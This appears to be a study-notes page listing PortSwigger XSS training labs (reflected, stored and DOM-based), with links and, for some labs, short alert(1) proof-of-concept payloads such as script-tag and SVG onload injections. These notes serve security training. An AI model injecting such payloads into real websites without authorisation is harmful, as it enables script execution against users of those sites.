search

Cross-Site Scripting (XSS)

hashtag
PortSwigger

XSS Cheat Sheet https://portswigger.net/web-security/cross-site-scripting/cheat-sheetarrow-up-right

XSS Labs https://portswigger.net/web-security/all-labs#cross-site-scriptingarrow-up-right

hashtag
Reflected XSS

Reflected XSS into HTML context with nothing encoded https://portswigger.net/web-security/cross-site-scripting/reflected/lab-html-context-nothing-encodedarrow-up-right

<script>alert(1)</script>

Reflected XSS into attribute with angle brackets HTML-encoded https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encodedarrow-up-right

"onmouseover="alert(1)

hashtag
Stored XSS

Stored XSS into HTML context with nothing encoded https://portswigger.net/web-security/cross-site-scripting/stored/lab-html-context-nothing-encodedarrow-up-right

<script>alert(1)</script>

hashtag
DOM XSS

DOM XSS in document.write sink using source location.search https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-document-write-sinkarrow-up-right

"><svg onload=alert(1)>

DOM XSS in innerHTML sink using source location.search https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-innerhtml-sinkarrow-up-right

DOM XSS in jQuery anchor href attribute sink using location.search source https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-href-attribute-sinkarrow-up-right

DOM XSS in jQuery selector sink using a hashchange event https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-jquery-selector-hash-change-eventarrow-up-right

PreviousCross-Site Request Forgery (CSRF)NextReflected File Download

Last updated